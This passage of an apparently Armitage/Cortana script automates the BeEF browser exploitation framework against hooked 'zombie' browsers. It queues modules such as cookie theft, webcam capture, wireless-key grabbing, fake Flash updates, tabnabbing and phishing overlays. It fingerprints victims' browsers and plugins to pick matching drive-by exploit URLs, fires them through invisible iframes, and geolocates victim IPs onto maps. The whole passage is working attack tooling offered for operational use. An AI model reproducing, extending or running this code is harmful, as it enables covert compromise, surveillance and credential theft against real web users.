, " \c8 COMMANDE INFOS \n Name: " . $name . "\n +---------------------------------------------+\n Description: " . $description . "\n Options: " . $options . "\n +-------------------------------------------+"); } # Prepare command that will be available from zombie sub-menu sub fill { $cmd_list_link = "" . $beefUrl . "/api/modules?token=" . $key . ""; $jsonTxt_cmde = [BeefRequester BeefGetRequest: "$cmd_list_link"]; $c = [CommandList extractCommands: $jsonTxt_cmde] ; for ($i = 0; $i < [$c size]; $i++) { $id = [CommandList extractcmdData: $jsonTxt_cmde, $i, "id"]; $name = [CommandList extractcmdData: $jsonTxt_cmde, $i, "name"]; $category = [CommandList extractcmdData: $jsonTxt_cmde, $i, "category"]; %cmde = %(id => "$id", name => "$name", category => "$category"); @beef_cmde[$i] = %cmde; #PERSISTENCE if ( $name eq "Man-In-The-Browser") { $code_mitb = $id;} if ( $name eq "Unhook") { $code_unhook = $id;} # RECON if ( $name eq "Port Scanner") { $code_portscan = $id;} if ( $name eq "DNS Enumeration") { $code_dnsenum = $id;} if ( $name eq "Fingerprint Network") { $code_fingnetwork = $id;} if ( $name eq "Fingerprint Browser") { $code_fingbrowser = $id;} if ( $name eq "Get Internal IP") { $code_ipnat = $id;} if ( $name eq "Get System Info") { $code_sysinfo = $id;} if ( $name eq "Get Wireless Keys") { $code_wireless = $id;} if ( $name eq "Replace HREFs (HTTPS)") { $code_replacehttps = $id;} if ( $name eq "Ping Sweep (Java)") { $code_pingjav = $id;} if ( $name eq "Get Visited URLs") { $code_visitedurl = $id;} if ( $name eq "Detect Software") { $code_detectsoft = $id;} if ( $name eq "Get Visited Domains") { $code_visitedomain = $id;} #ATTACK if ( $name eq "Create Invisible Iframe") { $code_inviframe = $id;} if ( $name eq "Raw JavasScript") { $code_rawjs = $id;} #SPECIAL if ( $name eq "Get Cookie") { $code_getcookie = $id;} if ( $name eq "Spyder Eye") { $code_screenshot = $id;} if ( $name eq "Get Geolocation") { $code_geoloc = $id;} if ( $name eq "Webcam") { $code_webcam = $id;} #SOCIAL ENG if ( $name eq "Fake Flash Update") { $code_fakeflash = $id;} if ( $name eq "Clickjacking") { $code_clickjak = $id;} if ( $name eq "TabNabbing") { $code_tabnabbing = $id;} if ( $name eq "Pretty Theft") { $code_theft = $id;} if ( $name eq "Clippy") { $code_clippy = $id;} #PERSISTENCE if ( $name eq "Man-In-The-Browser") { $code_persist_mitb = $id;} if ( $name eq "Create Foreground iFrame") { $code_persist_iframe = $id;} if ( $name eq "Confirm Close Tab") { $code_persist_closetab = $id;} } } popup autorun_hook { @ccr = flatten(table_selected($1, "id")); $ccr = @ccr[0]; item "Informations" { cmde_info($ccr); } item "Copy CC" { clipboard_set(join(", ", table_selected_single($1, "cc"))); } } popup cmde_hook { @idr = flatten(table_selected($1, "id")); @namedr = flatten(table_selected($1, "name")); @catdr = flatten(table_selected($1, "category")); $idr = @idr[0]; $namedr = @namedr[0]; $catdr = @catdr[0]; item "Informations" { cmde_info($idr); } menu "Add to autorun list" { item "For All" {%cmde = %(cc => "$id_beef_autorun", id => "$idr", name => "$namedr", category => "$catdr", browser => "All", Param => ""); @beef_autorun[$id_beef_autorun] = %cmde; $id_beef_autorun = $id_beef_autorun + 1 ; } item "IExplorer (IE)"{%cmde = %(cc => "$id_beef_autorun", id => "$idr", name => "$namedr", category => "$catdr", browser => "IE", Param => ""); @beef_autorun[$id_beef_autorun] = %cmde; $id_beef_autorun = $id_beef_autorun + 1 ; } item "Firefox (FF)"{%cmde = %(cc => "$id_beef_autorun", id => "$idr", name => "$namedr", category => "$catdr", browser => "FF", Param => ""); @beef_autorun[$id_beef_autorun] = %cmde; $id_beef_autorun = $id_beef_autorun + 1 ; } item "Chrome (C)"{%cmde = %(cc => "$id_beef_autorun", id => "$idr", name => "$namedr", category => "$catdr", browser => "C", Param => ""); @beef_autorun[$id_beef_autorun] = %cmde; $id_beef_autorun = $id_beef_autorun + 1 ; } item "Opera (O)"{%cmde = %(cc => "$id_beef_autorun", id => "$idr", name => "$namedr", category => "$catdr", browser => "O", Param => ""); @beef_autorun[$id_beef_autorun] = %cmde; $id_beef_autorun = $id_beef_autorun + 1 ; } item "Safary (S)"{%cmde = %(cc => "$id_beef_autorun", id => "$idr", name => "$namedr", category => "$catdr", browser => "S", Param => ""); @beef_autorun[$id_beef_autorun] = %cmde; $id_beef_autorun = $id_beef_autorun + 1 ; } item "Unknow(UN)"{%cmde = %(cc => "$id_beef_autorun", id => "$idr", name => "$namedr", category => "$catdr", browser => "UN", Param => ""); @beef_autorun[$id_beef_autorun] = %cmde; $id_beef_autorun = $id_beef_autorun + 1 ; } item "For Open Drive-by"{%cmde = %(cc => "$id_beef_autorun", id => "$idr", name => "$namedr", category => "$catdr", browser => "Sniper", Param => ""); @beef_autorun[$id_beef_autorun] = %cmde; $id_beef_autorun = $id_beef_autorun + 1 ; } } } ########################### HOST Sub-Menu ########################### popup host_bottom { item "BeEF" {local('$zombitableoff'); $zombitableoff = open_table_tab("zombies-OFF", "", @("id", "ip","name","version","OS","platform", "domain", "port", "URI", "sessionID"), @(), @("RefreshOFF"), "zmb_hookoff", 1); refresh_hostsoff($zombitableoff); # two tab is open for Online and offline zombies. local('$zombitable'); $zombitable = open_table_tab("zombies", "", @("id", "ip","name","version","OS","platform", "domain", "port", "URI", "sessionID"), @(), @("Refresh","More details"), "zmb_hook", 1); refresh_hosts($zombitable); } menu "Geolocate" { item "Satellite" { $freegeoip_url = "http://freegeoip.net/json/" . $1 . ""; $maptype = "satellite"; $json_freegeoip = [BeefRequester BeefGetRequest: "$freegeoip_url"]; geomap($json_freegeoip, $maptype); } item "Roadmap" { $freegeoip_url = "http://freegeoip.net/json/" . $1 . ""; $maptype = "roadmap"; $json_freegeoip = [BeefRequester BeefGetRequest: "$freegeoip_url"]; geomap($json_freegeoip, $maptype); } item "Geobytes web page" { $geobyte_url = "http://www.geobytes.com/IpLocator.htm?GetLocation&IpAddress=" ; url_open("$geobyte_url $+ $1"); } } } ######################## HOST ICON ################################### # when zombie is offline icon will turn red. This filter show you the browser hooked icon filter host_image { local('$ip $ipoff $name $nameoff'); $address = $2['address']; # Blue beef ICON for online zombie for ($i = 0; $i < size(@beef_hostsoff); $i++ ) { %hostoff = @beef_hostsoff[$i]; $ipoff = %hostoff['ip']; $nameoff = %hostoff['name']; if ($ipoff eq $address ){ push($1, script_resource("zombieoff.png")); break; } } for ($i = 0; $i < size(@beef_hosts); $i++ ) { %host = @beef_hosts[$i]; $ip = %host['ip']; $name = %host['name']; if ($ip eq $address ){ push($1, script_resource("zombie.png")); if ($name eq "IE"){ push($1, script_resource("iexplorer_hk.png")); } if ($name eq "FF"){ push($1, script_resource("firefox_hk.png")); } if ($name eq "C"){ push($1, script_resource("chrome_hk.png")); } if ($name eq "O"){ push($1, script_resource("opera_hk.png")); } if ($name eq "S"){ push($1, script_resource("safari_hk.png")); } if ($name eq "UN" || $name eq "null"){ push($1, script_resource("unknow_hk.png")); } } } # ICON appearance When sniper is targeting some browser. for ($i = 0; $i < size(@analyze); $i++ ) { %target_dr = @analyze[$i]; $iptarget = %target_dr['ip']; if ($iptarget eq $address ){ push($1, script_resource("sniper.png")); } } return @_; } ######################## GEOLOCATE ZOMBIE ON A MAP ################## # Use freegeoip.net web services # sub geomap { $js = [new JSONObject]; $js = [JSONSerializer toJSON: "$1"]; $ipmap = [[$js get: "ip"] toString]; $country = [[$js get: "country_name"] toString]; $city = [[$js get: "city"] toString]; $lat = [[$js get: "latitude"] toString]; $lon = [[$js get: "longitude"] toString]; $map_url = "http://maps.google.com/maps/api/staticmap?size=512x512¢er=" . $lat . "," . $lon . "&maptype=" . $2 . "&zoom=16&sensor=false"; $rndval = rand(9999); $mapfile = "$ipmap $+ $rndval $+ .png" ; cmd($console , "wget \"$map_url\" -O /root/.armitage/loots/" . $mapfile . ""); sleep(1000); $map_tab = open_image_tab("Geolocate", @(), @("No Image ? Try to Refresh Map","Map informations")); set_image($map_tab, file_get("/root/.armitage/loots/" . $mapfile . "")); } sub refresh_map { set_image($1, file_get("/root/.armitage/loots/" . $mapfile . "") ); } on tab_image_click { if ($3 eq "No Image ? Try to Refresh Map") { refresh_map($1); } if ($3 eq "Map informations") { show_message( "IP: " . $ipmap . "\n +---------------------+\n COUNTRY: " . $country . "\n CITY: " . $city . "\n +---All maps are saved in the loots---+"); } } # ____________ # | Ooh Yeah ! | # |____________| # _______ _____________________||________||___ #[_______==______________,----------._ [====]o'""-,__....----===== # [____(oooooooooooo)___________/__________ | # Browser Sniper //"""""""""" |====| [_) \ | # // \\ |====| \ | # // \\ |====| """" # (_) (_) `----' popup attacks { menu "Browser Sniper"{ item "Commands" { local('$commandtab'); $commandtab = open_table_tab("Commands", "", @("id","name","category"), @(), @("Fill it", "See autorun list"), "cmde_hook", 1); fill_cmde_tab($commandtab); } item "Autorun list" { local('$beef_autorun'); $beef_autorun = open_table_tab("BeEF autorun", "", @("cc", "id", "name", "category", "browser", "Param"), @(), @("Refresh list","Delete entry","Edit Param", "Load Clent-side Recon cmds", "Replay", "Clear All"), "autorun_hook", 1); refresh_list($beef_autorun); } item "Open Drive-by " { local('$sniper'); $sniper = open_table_tab("Open Drive-by", "", @("id", "Browser", "UserAgent", "Version", "OS", "Platform", "ActiveX", "Flash", "Java", "VBScript", "Plugins", "Attack_URL", "Link_cc"), @(), @("Add", "Refresh profiles","Edit", "Delete", "Line of sight"), "sniper_hook", 1); refresh_profiles($sniper); } item "Line of Sight(+) " { local('$attackMap'); $attackMap = open_table_tab("Line of Sight", "", @("id", "ip", "sessionID", "Attack_URL"), @(), @("Refresh match", "Change URL", " Attack all"), "analyze_hook", 1); refresh_analyze($attackMap); } #menu "Assault mode" { # item "Active" { # append($console, "\cC [*] Sniper is in assault mode"); # $assault = 1 ; # } # item "Stand-by" { # append($console, "\c4 [-] Sniper is in stand-by. \n this mode is usefull only if you want to send attack_URL manualy so that you control each attempt"); # $assault = 0 ; # } # } } } popup analyze_hook { # This action send attack_URL (drive-by) agains to a target selected by our Sniper. item "Fire !" { @sessid = flatten(table_selected($1, "sessionID")); @urlattack = flatten(table_selected($1, "Attack_URL")); $sessid_dr = @sessid[0]; $inviframe = @urlattack[0]; run_driveby($beefUrl, $sessid_dr, $key, $inviframe); append($console , "\c9[*] Sniper send attack " . $inviframe . " >>> " . $sessid_dr . "" ); } } sub refresh_analyze { table_set($1, @analyze); } sub refresh_list { table_set($1, @beef_autorun); } sub refresh_details { update_profile(); table_set($1, @browser_profile_list); } sub load_clientside_recon_mod { show_message("Client-side Recon. modules loaded"); if ( $key ne "00000000000000000000000") { %cmd0 = %(cc => "$id_beef_autorun", id => "$code_fingbrowser", name => "fingerprint browser", category => "client-side Recon", browser => "All", Param => ""); @beef_autorun[$id_beef_autorun] = %cmd0; $id_beef_autorun = $id_beef_autorun + 1 ; %cmd1 = %(cc => "$id_beef_autorun", id => "$code_replacehttps", name => "replace https hrefs by http", category => "client-side Recon", browser => "All", Param => ""); @beef_autorun[$id_beef_autorun] = %cmd1; $id_beef_autorun = $id_beef_autorun + 1 ; %cmd2 = %(cc => "$id_beef_autorun", id => "$code_visitedomain", name => "get visited domains", category => "client-side Recon", browser => "All", Param => ""); @beef_autorun[$id_beef_autorun] = %cmd2; $id_beef_autorun = $id_beef_autorun + 1 ; %cmd3 = %(cc => "$id_beef_autorun", id => "$code_visitedurl", name => "get visited URLs", category => "client-side Recon", browser => "All", Param => ""); @beef_autorun[$id_beef_autorun] = %cmd3; $id_beef_autorun = $id_beef_autorun + 1 ; %cmd4 = %(cc => "$id_beef_autorun", id => "$code_wireless", name => "get Wireless keys", category => "client-side Recon", browser => "All", Param => ""); @beef_autorun[$id_beef_autorun] = %cmd4; $id_beef_autorun = $id_beef_autorun + 1 ; %cmd5 = %(cc => "$id_beef_autorun", id => "$code_geoloc", name => "get Geolocation", category => "client-side Recon", browser => "All", Param => ""); @beef_autorun[$id_beef_autorun] = %cmd5; $id_beef_autorun = $id_beef_autorun + 1 ; %cmd6 = %(cc => "$id_beef_autorun", id => "$code_ipnat", name => "get internal IP (behind NAT)", category => "client-side Recon", browser => "All", Param => ""); @beef_autorun[$id_beef_autorun] = %cmd6; $id_beef_autorun = $id_beef_autorun + 1 ; %cmd7 = %(cc => "$id_beef_autorun", id => "$code_sysinfo", name => "get system information", category => "client-side Recon", browser => "All", Param => ""); @beef_autorun[$id_beef_autorun] = %cmd7; $id_beef_autorun = $id_beef_autorun + 1 ; %cmd8 = %(cc => "$id_beef_autorun", id => "$code_detectsoft", name => "detect installed software (IE only)", category => "client-side Recon", browser => "IE", Param => ""); @beef_autorun[$id_beef_autorun] = %cmd8; $id_beef_autorun = $id_beef_autorun + 1 ; say("BeEF system profiling modules have been loaded. Check autorun command list"); } } ####### PROFILES DEFINITION ##### # These actions is very important for Sniper's functionnalities: # Here you define what exploits to use against any browser's profiles sub refresh_profiles { table_set($1, @targets); } #sub edit_cclink { # @idf = flatten(table_selected($1, "id")); # $idf = @idf[0]; # @cclink = flatten(table_selected($1, "Link_cc")); # $cclink = @cclink[0]; # $cclink = prompt_text("Set CC ","$cclink"); # %tt = @targets[$idf] # %tt["Link_cc"] = $cclink ; # refresh_list($1); # } sub edit_profiles { @i = flatten(table_selected($1, "id")); @brow = flatten(table_selected($1, "Browser")); @ua = flatten(table_selected($1, "UserAgent")); @ver = flatten(table_selected($1, "Version")); @os = flatten(table_selected($1, "OS")); @plat = flatten(table_selected($1, "Platform")); @actv = flatten(table_selected($1, "ActiveX")); @fls = flatten(table_selected($1, "Flash")); @jv = flatten(table_selected($1, "Java")); @vbs = flatten(table_selected($1, "VBScript")); @plg = flatten(table_selected($1, "Plugins")); @urlb = flatten(table_selected($1, "Attack_URL")); @cclink = flatten(table_selected($1, "Link_cc")); $id_dr = @i[0]; $brow_dr = @brow[0]; $ua = @ua[0]; $ver_dr = @ver[0]; $os_dr = @os[0]; $plat_dr = @plat[0]; $actv_dr = @actv[0]; $fls_dr = @fls[0]; $jv_dr = @jv[0]; $vbs_dr = @vbs[0]; $plg_dr = @plg[0]; $urlb_dr = @urlb[0]; $cclink = @cclink[0]; if ($id_dr ne "" || $id_dr ne " ") { $browser_dr = prompt_text("Browser","$brow_dr"); $ua_dr = prompt_text("UserAgent","$ua_dr"); $version_dr = prompt_text("Version","$ver_dr"); $os_dr = prompt_text("OS","$os_dr"); $platform_dr = prompt_text("Plateform","$plat_dr"); $activex_dr = prompt_text("Activex","$actv_dr"); $flash_dr = prompt_text("Flash","$fls_dr"); $java_dr = prompt_text("Java","$jv_dr"); $vbs_dr = prompt_text("VBScript","$vbs_dr"); $plugins_dr = prompt_text("Plugins ","$plg_dr"); $url_dr = prompt_text("URL of the attack to link with this profile","$urlb_dr"); $cclink = prompt_text("Command Code (cc) from Autorun list to link with this profile","$cclink"); %host_dr = %(id => $id_dr, Browser => "$browser_dr", UserAgent => "$ua_dr", Version => "$version_dr", OS => "$os_dr", Platform => "$platform_dr", ActiveX => "$activex_dr", Flash => "$flash_dr", Java => "$java_dr", VBScript => "$vbs_dr", Plugins => "$plugins_dr" , Attack_URL => "$url_dr" , Link_cc => "$cclink"); @targets[$id_dr] = %host_dr; refresh_profiles($1); } else {show_message("No Field selected");} } sub add_profiles { $browser_dr = prompt_text("Browser","*"); $ua_dr = prompt_text("UserAgent","*"); $version_dr = prompt_text("Version","*"); $os_dr = prompt_text("OS","*"); $platform_dr = prompt_text("Plateform","*"); $activex_dr = prompt_text("Activex","*"); $flash_dr = prompt_text("Flash","*"); $java_dr = prompt_text("Java","*"); $vbs_dr = prompt_text("VBScript","*"); $plugins_dr = prompt_text("Plugins ","*"); $url_dr = prompt_text("URL of the attack to map with this profile","http://"); $cclink = prompt_text("Command Code (cc) from Autorun list to link with this profile","-"); %host_dr = %(id => "$targets_id", Browser => "$browser_dr", UserAgent => "$ua_dr", Version => "$version_dr", OS => "$os_dr", Platform => "$platform_dr", ActiveX => "$activex_dr", Flash => "$flash_dr", Java => "$java_dr", VBScript => "$vbs_dr", Plugins => "$plugins_dr" , Attack_URL => "$url_dr" , Link_cc => "$cclink"); @targets[$targets_id] = %host_dr; $targets_id = $targets_id + 1 ; refresh_profiles($1); } sub delete_profiles { @i = flatten(table_selected($1, "id")); $id_dr = @i[0]; removeAt(@targets, $id_dr); refresh_profiles($1); } sub delete_entry { @i = flatten(table_selected($1, "cc")); $cc = @i[0]; removeAt(@beef_autorun, $cc); refresh_list($1); } #-----------------=========================================-------------------# sub editparam { @cc = flatten(table_selected($1, "cc")); @editparm = flatten(table_selected($1, "Param")); $cc = @cc[0]; $editparm = @editparm[0]; $editparm = prompt_text("Edit Parameter(s)","$editparm"); @beef_autorun[$cc]["Param"] = $editparm ; refresh_list($1); } # This action change attack_URL that have been affected by sniper to a particular zombie. sub changeurl { @i = flatten(table_selected($1, "id")); @urlb = flatten(table_selected($1, "Attack_URL")); $id_dr = @i[0]; $urlb_dr = @urlb[0]; $url_dr = prompt_text("URL of the attack to map with this profile","$urlb_dr"); @analyze[$id_dr]["Attack_URL"] = $url_dr ; refresh_analyze($1); } ###- intelligence analysis -#### sub checker { #local('$match %extract'); %extract = $2 ; println("value checked:"); println("$1 : " . %profile["$1"] . ""); if ( %profile["$1"] ne "*"){ $eval = %profile["$1"]; $match_regex = "(.*|\\s) $+ $eval $+ (\\s|.*)" ; println("regex in use:"); println($match_regex); println("Value to evaluate:"); println(%extract["$1"]); if ( %extract["$1"] ismatch $match_regex ){ println("Bot have found that :" . %extract["$1"] . " YES > " . $eval . ""); $match = 0; return $match;} else{println("Bot have found that :" . %extract["$1"] . " NO > " . $eval . ""); $match = 1; return $match;} } else { println("pass ..."); $match = 0; return $match;} } sub rematch { clear(@analyze); $id_analyz = 0 ; for ($i = 0; $i < size(@beef_hosts); $i++ ) { %thishost = @beef_hosts[$i]; $this_sip = @beef_hosts[$i]["ip"]; $this_sid = %thishost['sessionID']; $link = "" . $beefUrl . "/api/hooks/" . $this_sid . "?token=" . $key . ""; $details = [BeefRequester BeefGetRequest: "$link"];#sleep(100); $js = [new JSONObject]; $js = [JSONSerializer toJSON: "$details"]; $This_BrowserName = [[$js get: "BrowserName"] toString];#used by sniper $This_BrowserPlugins = [[$js get: "BrowserPlugins"] toString]; $This_BrowserReportedName = [[$js get: "BrowserReportedName"] toString]; $This_BrowserType = [[$js get: "BrowserType"] toString]; $This_BrowserVersion = [[$js get: "BrowserVersion"] toString]; $This_HasActiveX = [[$js get: "HasActiveX"] toString]; $This_HasFlash = [[$js get: "HasFlash"] toString]; $This_HasGoogleGears = [[$js get: "HasGoogleGears"] toString]; $This_HasWebSocket = [[$js get: "HasWebSocket"] toString]; $This_HostName = [[$js get: "HostName"] toString]; $This_JavaEnabled = [[$js get: "JavaEnabled"] toString]; $This_OsName = [[$js get: "OsName"] toString]; $This_SystemPlatform = [[$js get: "SystemPlatform"] toString]; $This_VBScriptEnabled = [[$js get: "VBScriptEnabled"] toString]; %extracted = %(id => "$1", sessionID => "$this_sid", Browser => "$This_BrowserName", UserAgent => "$This_BrowserReportedName", Type => "$This_BrowserType", Version => "$This_BrowserVersion", OS => "$This_OsName", Platform => "$This_SystemPlatform", ActiveX => "$This_HasActiveX", Flash => "$This_HasFlash", Java => "$This_JavaEnabled", VBScript => "$This_VBScriptEnabled", Plugins => "$This_BrowserPlugins", GoogleGears => "$This_HasGoogleGears", WebSocket => "$This_HasWebSocket", HostName => "$This_HostName" ); println("Check profile existence :"); println(%extracted["Browser"]); # STEP 2 - Try to find profiles matching with zombies's informations - if the sum is > than 0 => No match ! Pass foreach $index => $value (@targets){ %profile = $value; $decision = checker("UserAgent", %extracted) + checker("Browser", %extracted) + checker("Version", %extracted) + checker("OS", %extracted) + checker("Platform", %extracted) + checker("ActiveX", %extracted) + checker("Flash", %extracted) + checker("Java", %extracted) + checker("VBScript", %extracted) + checker("Plugins", %extracted) ; # STEP 3 - Zombies maps each with a client-side exploit well suited if we found one. println("$decision"); if ($decision == 0){ $inviframe = %profile["Attack_URL"]; %analyz_dr = %(id => "$id_analyz", ip => "$this_sip", sessionID => "$this_sid" , Attack_URL => "$inviframe"); @analyze[$id_analyz] = %analyz_dr; $id_analyz = $id_analyz + 1 ; append($console , "\c9[+] Sniper has found a target that match with one of your defined profiles " ); }else{ } } } }